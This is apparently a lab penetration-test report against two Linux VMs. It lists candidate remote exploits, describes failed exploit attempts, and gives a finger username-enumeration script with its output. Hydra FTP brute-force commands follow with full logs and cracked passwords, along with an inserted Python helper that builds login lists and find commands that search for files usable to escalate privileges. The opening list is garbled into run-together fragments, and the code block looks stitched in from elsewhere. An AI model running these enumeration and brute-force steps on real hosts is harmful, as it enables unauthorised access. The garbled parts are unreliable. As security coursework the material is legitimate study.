0.http://www.org/exp/exploits/remote/2006031901.Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4) 2007-03-24.Apache < 1.org/exp/exploits/remote/2007033002.org/exp/exploits/remote/2006082105.http://www.anyside.org/exp/exploits/remote/2007101401.IPSwitch IMAP Server LOGON Remote Stack Overflow 2005-09-20.txt.http://www.3 p1 (Duplicated Block) Remote Denial of Service Exploit 2007-01-15.txt.2.txt.anyside.ypupdated Remote Root Exploit (meta) 2008-04-06.txt.txt.Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit 2007-02-01.txt.http://www.anyside.anyside.anyside.txt.txt.http://www.http://www.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit 2007-03-10.http://www.2.18 (Netfilter NAT SNMP Module) Remote DoS Exploit 2006-07-23.txt.Mercur Mailserver 5.org/exp/exploits/remote/2006091101.Debian .MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) 2008-04-04.58 mod_rewrite Remote Overflow Exploit (win2k3) 2007-05-30.anyside.anyside.anyside.org/exp/exploits/remote/2007011502.0.Mercur Mailserver 5.txt.0.http://www.Mercury Mail <= 4. 
2.txt.http://www.anyside.txt.txt.Snort 2.org/exp/exploits/remote/2008071701.txt.17 Remote Directory Listing Vulnerability 2006-08-21.Apache 2.20 Remote Buffer Overflow Exploit 2007-07-08.org/exp/exploits/remote/2008040401.0.anyside.Snort 2.Apache Tomcat Connector jk2-2.anyside.anyside.anyside.http://www.anyside.txt.Apache Tomcat (webdav) Remote File Disclosure Exploit 2007-10-21.http://www.org/exp/exploits/remote/2007040701.37.Apache mod_jk 1.anyside.2005-06-07.01a (Pegasus) IMAP Buffer Overflow Exploit 2006-03-10.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit 2007-03-01.MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption 2007-03-21.http://www.Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield) 2007-09-03.org/exp/exploits/remote/2006092701.anyside.txt.dll) RPC Server DoS Exploit 2007-02-23.org/exp/exploits/remote/2008040601.org/exp/exploits/remote/2007102101.http://www.CCProxy <= v6.txt.5.txt.http://www.org/exp/exploits/remote/2007030102.2.http://www.http://www.txt.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2) 2006-09-27.Mercury Mail 4.2 Telnet Proxy Ping Overflow Exploit (meta) 2007-10-14.txt.anyside.org/exp/exploits/remote/2007121805.anyside.org/exp/exploits/remote/2007032101.http://www.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux) 2007-04-07.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit 2007-03-30.org/exp/exploits/remote/2006060506.6.org/exp/exploits/remote/2007022306.txt.txt.0 SP3 (IMAP) Remote Buffer Overflow Exploit 2006-03-19.Snort 2.anyside.2 (mod_jk2) Remote Overflow Exploit 2008-06-30.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day 2007-06-22.org/exp/exploits/remote/2007090301.http://www.anyside.3 (mod_rewrite) Remote Overflow PoC 2006-09-11.19/1.http://www.txt.org/exp/exploits/remote/2007020107.anyside.http://www.txt.anyside.org/exp/exploits/remote/2006031903.http://www.2.Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service 2006-03-19.txt.Sun Solaris <= 10 rpc.http://www.Apache 
- http://www.anyside.org/exp/exploits/remote/2007121805.txt - Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) 2007-12-18
- http://www.anyside.org/exp/exploits/remote/2006060506.txt - Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit 2006-06-05
- http://www.anyside.org/exp/exploits/remote/2006072301.txt - Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit 2006-07-23
- http://www.anyside.org/exp/exploits/remote/2007022306.txt - CA BrightStor ARCserve 11.5.0 (catirpc.dll) RPC Server DoS Exploit 2007-02-23
- http://www.anyside.org/exp/exploits/remote/2006082105.txt - Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability 2006-08-21
- http://www.anyside.org/exp/exploits/remote/2008071701.txt - OpenSSH Remote SELinux Privilege Elevation Exploit (auth) 2008-07-17
- http://www.anyside.org/exp/exploits/remote/2008071702.txt - Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS 2008-07-17
- http://www.anyside.org/exp/exploits/remote/2007062201.txt - Eudora 7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day 2007-06-22
- http://www.anyside.org/exp/exploits/remote/2007041501.txt - Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32) 2007-04-15
- http://www.anyside.org/exp/exploits/remote/2007053001.txt - Apache < 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) 2007-05-30
- http://www.anyside.org/exp/exploits/remote/2007052601.txt - MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) 2007-05-26
- http://www.anyside.org/exp/exploits/remote/2007032101.txt - Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod) 2007-03-21
- http://www.anyside.org/exp/exploits/remote/2007032401.txt - Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4) 2007-03-24
- http://www.anyside.org/exp/exploits/remote/2007031002.txt - Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit 2007-03-10
- http://www.anyside.org/exp/exploits/remote/2006031002.txt - Mercury Mail 4.01a (Pegasus) IMAP Buffer Overflow Exploit 2006-03-10
- http://www.anyside.org/exp/exploits/remote/2007070801.txt - Apache mod_jk 1.2.20 Remote Buffer Overflow Exploit 2007-07-08
- http://www.anyside.org/exp/exploits/remote/2008063003.txt - Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit 2008-06-30
- http://www.anyside.org/exp/exploits/remote/2005092001.txt - IPSwitch IMAP Server LOGON Remote Stack Overflow 2005-09-20
- http://www.anyside.org/exp/exploits/remote/2005060701.txt - 2005-06-07
- http://www.anyside.org/exp/exploits/remote/2008090501.txt - MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC 2008-09-05
- http://www.anyside.org/exp/exploits/remote/2008090503.txt - Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability 2008-09-05
- http://www.anyside.org/exp/exploits/remote/2008071801.txt - Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit 2008-07-18
- http://www.anyside.org/exp/exploits/remote/2008081101.txt - Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32) 2008-08-11
- http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c - Remote exploit for Apache + OpenSSL v0.9.6d and below
- http://www.anyside.org/exp/exploits/remote/ADMmountd.c - ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
- http://www.anyside.org/exp/exploits/remote/Snmppd.c - Snmppd SNMP proxy daemon format string exploit

While this list looks impressive in length, removing exploits that don't match the operating system, don't match the software installed, don't match the proper version or don't provide a privilege escalation leaves only 3 exploits.

ii. Exploits – round 1

The 3 exploits found were downloaded and reviewed. The following lists the exploits in the order they were attempted (from most to least likely to work).

- Remote exploit for Apache + OpenSSL v0.9.6d and below (OpenFuckV2.c). This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux. Reviewing the source code for this exploit reveals that it appears to match all of the required criteria. While the Apache version matches perfectly, the kernel version 2.4.20-8 is more commonly associated with a Red Hat 9.0 installation rather than a Red Hat 8.0 installation. The code was successfully compiled after making minor modifications to the source to provide missing openssl include files. The execution of the exploit was unsuccessful.

- ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit (ADMmountd.c). Reviewing the code for this exploit reveals that the exploit was written in 1998. The possibility of this exploit being successful was deemed to be very slim. The code was successfully compiled after making major modifications to the source to fix syntax issues due to line wrapping/formatting defects. The execution of the exploit was unsuccessful.

- Snmppd SNMP proxy daemon format string exploit (Snmppd.c). The code was successfully compiled without issues. The execution of the exploit was unsuccessful.

iii. Research via secwatch.org

Having exhausted the exploits known to the anyside.org site, the secwatch.org site was used to continue the search. The search results were quite extensive compared to the anyside.org list. However, only one additional exploit was located: the “UW imapd IMAP 4.1 server” exploit. The service was fingerprinted as “UW Imapd 2001.315rh”. This exploit is meant for the 2001.315 version of the uw-imapd service. The rh addition to the version may indicate that Red Hat has applied a patch to resolve the vulnerability; Red Hat backports security fixes into the shipped version and appends its own suffix, so a matching upstream version string is not proof that the service is still vulnerable.

iv. Exploits – round 2

After quite an extensive review of possible exploits, the only additional exploit located was the “UW imapd IMAP 4.1 server” exploit.

- UW imapd IMAP 4.1 server. The exploit was successfully compiled after making minor modifications to the source to fix syntax issues due to line wrapping/formatting defects. The execution of the exploit was unsuccessful.

D. User discovery

i. Abuse of finger

The finger service running on port 79/tcp provides us with the ability to brute force user names on the cptvm1 host. To accomplish this, a shell script executing finger over a list of user names was implemented. The list of user names was generated by googling for a list of common user names. The VM running back|track3 did not have a proper finger client installed, so this command was executed from the host machine under OSX.

$ cat fingerListOfUserNames.sh
#!/bin/bash
while read userName; do
    finger ${userName}@$1 >> "usersOn$1_RAW.txt"
done < $2
sed -e '/^finger:/d' -e "/^\[$1/d" "usersOn$1_RAW.txt" > "usersOn$1_FOUND.txt"
awk '/^Login:/ { print $2 }' "usersOn$1_FOUND.txt" | sort -u > "usersOn$1.txt"
$ fingerListOfUserNames.sh 192.168.1.200 usernames.txt
$ ls -alF
total 96
drwxr-xr-x   7 matt  matt    238 Feb 11 22:23 ./
drwxr-xr-x  11 matt  matt    374 Feb 10 19:12 ../
-rwxr-xr-x   1 matt  matt    291 Feb 11 22:06 fingerListOfUserNames.sh*
-rw-r--r--   1 matt  matt   3550 Feb 10 19:31 usernames.txt
-rw-r--r--   1 matt  matt    107 Feb 11 22:06 usersOn192.168.1.200.txt
-rw-r--r--   1 matt  matt   4699 Feb 11 21:46 usersOn192.168.1.200_FOUND.txt
-rw-r--r--   1 matt  matt  26235 Feb 11 21:46 usersOn192.168.1.200_RAW.txt
$ cat usersOn192.168.1.200.txt
adm
apache
daemon
ftp
lp
mail
nfsnobody
nobody
nscd
operator
postgres
root
rpc
rpcuser
sshd
user
uucp
vcsa

The script takes the target host as $1 and the user name list as $2, appends every finger reply to the _RAW file, strips the “finger: <name>: no such user” lines and the “[host]” banner lines to produce the _FOUND file, and extracts the login from each Login: line. The names of 18 users on the cptvm1 host were discovered. Reviewing the output from the finger command (the Shell: field of each entry) reveals that of the 18 user accounts, only the “root”, “user” and “postgres” users have the ability to login to a standard shell.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  TCP services:
    7/tcp      echo
    21/tcp     ftp        vsftpd 1.1.3
    22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp     telnet     Linux telnetd
    79/tcp     finger     Linux fingerd
    80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp    POSSIBLY pop2
    110/tcp    pop3       ipopd 2001.78rh
    111/tcp    rpcbind    2 (rpc #100000)
    143/tcp    imap       UW Imapd 2001.315rh
    199/tcp    smux       Linux SNMP multiplexer
    443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp    rquotad    1-2 (rpc #100011)
    993/tcp    imaps
    995/tcp    pop3s
    6000/tcp   X11
    32768/tcp  status     1 (rpc #100024)
    32770/tcp  mountd     1-3 (rpc #100005)
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  UDP services:
    7/udp      echo
    13/udp     daytime
    37/udp     time (32 bits)
    111/udp    rpcbind    2 (rpc #100000)
    123/udp    ntp
    161/udp    snmp       SNMPv1 server (public)
    162/udp    snmptrap
    631/udp    unknown
    683/udp    rquotad    1-2 (rpc #100011)
  User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd, operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
    111/tcp    rpcbind    2 (rpc #100000)
    939/tcp    status     1 (rpc #100024)
E. Brute force password guessing

i. Discovery of password for “user” account

As various remote exploits have been unsuccessful, a brute force attack against the password of the “user” and “postgres” accounts was attempted. The hydra utility was selected as it allows a list of user names to be provided, a list of passwords to be provided and the protocol to be used. The user accounts file was populated by taking the user accounts configured to login with a standard shell. The root user was removed from the list as the ftp service did not allow root logins. The passwords list was located by googling for a list of the most common passwords used.

Typically, password guessing of user accounts is stifled with configuration items like locking user accounts after exceeding a maximum number of login attempts, or by providing an exponentially increasing delay between invalid login attempts. In the case of the ftp service listening on port 21/tcp, neither of these techniques was applied: the attack sustained roughly 406 attempts per minute for several hours without a single rejected connection.

bt user # cat usernames/cptvm1.users.txt
user
postgres
bt user # hydra -e n -L usernames/cptvm1.users.txt -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-27 22:57:29
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 402.00 tries/min, 402 tries in 00:01h, 139356 todo in 05:47h
[STATUS] 402.00 tries/min, 1206 tries in 00:03h, 138552 todo in 05:45h
[STATUS] 404.71 tries/min, 2833 tries in 00:07h, 136925 todo in 05:39h
[STATUS] 405.60 tries/min, 6084 tries in 00:15h, 133674 todo in 05:30h
[STATUS] 406.06 tries/min, 12588 tries in 00:31h, 127170 todo in 05:14h
[STATUS] 406.21 tries/min, 19092 tries in 00:47h, 120666 todo in 04:58h
[STATUS] 406.27 tries/min, 25595 tries in 01:03h, 114163 todo in 04:42h
[21][ftp] host: 192.168.1.200   login: user   password: digital
[STATUS] 406.33 tries/min, 32100 tries in 01:19h, 107658 todo in 04:25h
[STATUS] 406.34 tries/min, 38602 tries in 01:35h, 101156 todo in 04:09h
[STATUS] 406.36 tries/min, 45106 tries in 01:51h, 94652 todo in 03:53h
[STATUS] 406.40 tries/min, 51613 tries in 02:07h, 88145 todo in 03:37h
[STATUS] 406.43 tries/min, 58119 tries in 02:23h, 81639 todo in 03:21h
[STATUS] 406.46 tries/min, 64627 tries in 02:39h, 75131 todo in 03:05h
[STATUS] 406.47 tries/min, 71133 tries in 02:55h, 68625 todo in 02:49h
[STATUS] 406.49 tries/min, 77639 tries in 03:11h, 62119 todo in 02:33h
[STATUS] 406.50 tries/min, 84145 tries in 03:27h, 55613 todo in 02:17h
[STATUS] 406.53 tries/min, 90656 tries in 03:43h, 49102 todo in 02:01h
[STATUS] 406.53 tries/min, 97160 tries in 03:59h, 42598 todo in 01:45h
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-28 03:05:41

The result of this attack was the discovery of the password “digital” for the “user” account. The credentials were validated by sshing into the cptvm1 host. An attempt to login to the cptvm2 host using the same user name and password was unsuccessful.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  TCP services:
    7/tcp      echo
    21/tcp     ftp        vsftpd 1.1.3
    22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp     telnet     Linux telnetd
    79/tcp     finger     Linux fingerd
    80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp    POSSIBLY pop2
    110/tcp    pop3       ipopd 2001.78rh
    111/tcp    rpcbind    2 (rpc #100000)
    143/tcp    imap       UW Imapd 2001.315rh
    199/tcp    smux       Linux SNMP multiplexer
    443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp    rquotad    1-2 (rpc #100011)
    993/tcp    imaps
    995/tcp    pop3s
    6000/tcp   X11
    32768/tcp  status     1 (rpc #100024)
    32770/tcp  mountd     1-3 (rpc #100005)
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  UDP services:
    7/udp      echo
    13/udp     daytime
    37/udp     time (32 bits)
    111/udp    rpcbind    2 (rpc #100000)
    123/udp    ntp
    161/udp    snmp       SNMPv1 server (public)
    162/udp    snmptrap
    631/udp    unknown
    683/udp    rquotad    1-2 (rpc #100011)
  User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd, operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
  Username/password: user/digital

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
    111/tcp    rpcbind    2 (rpc #100000)
    939/tcp    status     1 (rpc #100024)

ii. Discovery of password for “cptvm1” and “cptvm2” accounts

Upon the successful login to the cptvm1 host, the /etc/passwd file was reviewed. This provided all of the names for the user accounts on the cptvm1 host. Two accounts of high interest, “cptvm1” and “cptvm2”, were identified. While researching the configuration of the cptvm1 host, a brute force password guessing attack was launched against the “cptvm1” and “cptvm2” users.

The initial attack had an incorrect switch in the command line (-f). This switch instructs hydra to stop executing as soon as a valid user name/password pair is found. As a result of the incorrect switch, a second attack to discover the “cptvm2” account password had to be completed. The end result of the attacks was the discovery of the “cptvm1” and “cptvm2” passwords (cptvm1/windows, cptvm2/linux). The credentials were validated by sshing into the cptvm1 host using both accounts. Successful ssh connections were also established to the cptvm2 host using the accounts. The /etc/passwd file on the cptvm2 host was then reviewed for accounts of interest.

bt ~ # cat usernames/cptvm1.users2.txt
cptvm1
cptvm2
bt ~ # hydra -e n -f -L usernames/cptvm1.users2.txt -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 18:26:44
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 416.00 tries/min, 416 tries in 00:01h, 139342 todo in 05:35h
[STATUS] 405.33 tries/min, 1216 tries in 00:03h, 138542 todo in 05:42h
[STATUS] 406.86 tries/min, 2848 tries in 00:07h, 136910 todo in 05:37h
[STATUS] 406.40 tries/min, 6096 tries in 00:15h, 133662 todo in 05:29h
[STATUS] 151.78 tries/min, 12987 tries in 01:25h, 126771 todo in 13:56h
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 20:38:12
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 8410.00 tries/min, 8410 tries in 00:01h, 131348 todo in 00:16h
[STATUS] 3072.00 tries/min, 9216 tries in 00:03h, 130542 todo in 00:43h
[STATUS] 1549.71 tries/min, 10848 tries in 00:07h, 128910 todo in 01:24h
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h
[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h
[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h
[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h
[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h
[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h
[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h
[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h
[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h
[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h
[21][ftp] host: 192.168.1.200   login: cptvm1   password: windows
[STATUS] attack finished for 192.168.1.200 (valid pair found)
Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25

bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56
[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h
[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h
[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h
[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h
[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h
[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h
[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h
[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h
[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h
[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h
[21][ftp] host: 192.168.1.200   login: cptvm2   password: linux
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  TCP services:
    7/tcp      echo
    21/tcp     ftp        vsftpd 1.1.3
    22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp     telnet     Linux telnetd
    79/tcp     finger     Linux fingerd
    80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp    POSSIBLY pop2
    110/tcp    pop3       ipopd 2001.78rh
    111/tcp    rpcbind    2 (rpc #100000)
    143/tcp    imap       UW Imapd 2001.315rh
    199/tcp    smux       Linux SNMP multiplexer
    443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp    rquotad    1-2 (rpc #100011)
    993/tcp    imaps
    995/tcp    pop3s
    6000/tcp   X11
    32768/tcp  status     1 (rpc #100024)
    32770/tcp  mountd     1-3 (rpc #100005)
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  UDP services:
    7/udp      echo
    13/udp     daytime
    37/udp     time (32 bits)
    111/udp    rpcbind    2 (rpc #100000)
    123/udp    ntp
    161/udp    snmp       SNMPv1 server (public)
    162/udp    snmptrap
    631/udp    unknown
    683/udp    rquotad    1-2 (rpc #100011)
  User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, distcache, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
  Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
    111/tcp    rpcbind    2 (rpc #100000)
    939/tcp    status     1 (rpc #100024)
  User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
  Username/password: cptvm1/windows, cptvm2/linux
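The finger sweep in section D and the /etc/passwd review above answer the same question from two sides: which logins end in a real shell and are therefore worth a password guess. The Python below is an added example, not code from this report; it parses a constructed finger capture and a constructed /etc/passwd excerpt (neither is data taken from cptvm1), keeps only accounts with an interactive shell, drops root for the vsftpd attack, and reports which accounts a wordlist-driven finger sweep never asked about, which is why cptvm1 and cptvm2 only surfaced once the local file was read. The shell whitelist is an assumption of the example.

```python
import re
from typing import Dict, Iterable, List, Set

# Shells that give a login a real command line (assumption of this example).
# Locking shells such as /sbin/nologin, /bin/false, /sbin/halt, /sbin/shutdown
# and /bin/sync are deliberately absent, so they classify as non-interactive.
INTERACTIVE_SHELLS: Set[str] = {"bash", "sh", "ksh", "csh", "tcsh", "zsh", "dash"}

# Constructed finger output (not captured from the report's hosts): what the
# fingerListOfUserNames.sh loop appends to usersOn<host>_RAW.txt, including
# the "[host]" banner lines and the "no such user" line its sed step deletes.
SAMPLE_FINGER = """\
[192.168.1.200]
Login: root            Name: root
Directory: /root                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.
[192.168.1.200]
finger: backup: no such user.
[192.168.1.200]
Login: adm             Name: adm
Directory: /var/adm              Shell: /sbin/nologin
Never logged in.
No Plan.
[192.168.1.200]
Login: user            Name: (null)
Directory: /home/user            Shell: /bin/bash
Never logged in.
No Plan.
[192.168.1.200]
Login: postgres        Name: PostgreSQL Server
Directory: /var/lib/pgsql        Shell: /bin/bash
Never logged in.
No Plan.
"""

# Constructed /etc/passwd excerpt (not the report's file). cptvm1 and cptvm2
# are names no googled wordlist would contain.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
halt:x:7:0:halt:/sbin:/sbin/halt
sync:x:5:0:sync:/sbin:/bin/sync
adm:x:3:4:adm:/var/adm:/sbin/nologin
user:x:500:500::/home/user:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
cptvm1:x:501:501::/home/cptvm1:/bin/bash
cptvm2:x:502:502::/home/cptvm2:/bin/bash
"""

# finger prints the login on one line and the shell on the next; match the pair.
FINGER_RE = re.compile(r"^Login:\s+(\S+)[^\n]*\nDirectory:[^\n]*?\sShell:\s+(\S+)", re.M)


def parse_finger(text: str) -> Dict[str, str]:
    """Map login -> shell. Banner and 'no such user' lines never form a
    Login/Directory pair, so they drop out without a separate sed pass."""
    return {m.group(1): m.group(2) for m in FINGER_RE.finditer(text)}


def parse_passwd(text: str) -> Dict[str, str]:
    """Map login -> shell from /etc/passwd (7th field; empty means /bin/sh)."""
    shells: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and not line.startswith("#"):
            shells[fields[0]] = fields[6] or "/bin/sh"
    return shells


def is_interactive(shell: str) -> bool:
    return shell.rsplit("/", 1)[-1] in INTERACTIVE_SHELLS


def interactive_accounts(shells: Dict[str, str]) -> List[str]:
    """Logins that land in a real shell: the only ones worth a password guess."""
    return sorted(login for login, shell in shells.items() if is_interactive(shell))


def hydra_login_list(shells: Dict[str, str], exclude: Iterable[str] = ("root",)) -> List[str]:
    """Contents for hydra's -L file; root is dropped because vsftpd refuses it."""
    skip = set(exclude)
    return [login for login in interactive_accounts(shells) if login not in skip]


def missed_by_finger(finger: Dict[str, str], passwd: Dict[str, str]) -> List[str]:
    """Accounts in /etc/passwd that the finger wordlist never probed."""
    return sorted(set(passwd) - set(finger))


if __name__ == "__main__":
    finger, passwd = parse_finger(SAMPLE_FINGER), parse_passwd(SAMPLE_PASSWD)
    print("finger, shell logins:", interactive_accounts(finger))
    print("hydra -L list:", hydra_login_list(finger))
    print("missed by finger:", missed_by_finger(finger, passwd))
```

Two points the report's pipeline makes visible: a wordlist sweep can only confirm names that are already on the list, and the shell field, not the mere existence of the account, decides whether a guessed password is usable over ssh.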
F. Research of cptvm1 and cptvm2 hosts

i. cptvm1

Various data was gathered pertaining to the permissions of files within the system. Items of interest were files having permissions set to run as root, files having permissions incorrectly set to allow anyone to read/write/execute them, and files owned by one of the accounts with a known password.

The locations of all files owned by the “cptvm1”, “cptvm2” and “user” accounts (accounts we have passwords for) were gathered. This may provide the ability to access data or executables we normally should not have privileges to.

[cptvm1@cptvm1 ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 -o -user user \) -printf "%m %u %g %h/%f\n" > ~/find-typef-a-usercptvm1-o-usercptvm2-o-useruser_200.txt

The locations of all files that are owned by a group we belong to and are group-writable or group-executable were gathered (-perm +030 matches files with the write or the execute bit set for the group). This may provide the ability to modify data or execute tasks we normally should not have privileges to.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-o-groupcptvm2-o-groupuser_200.txt

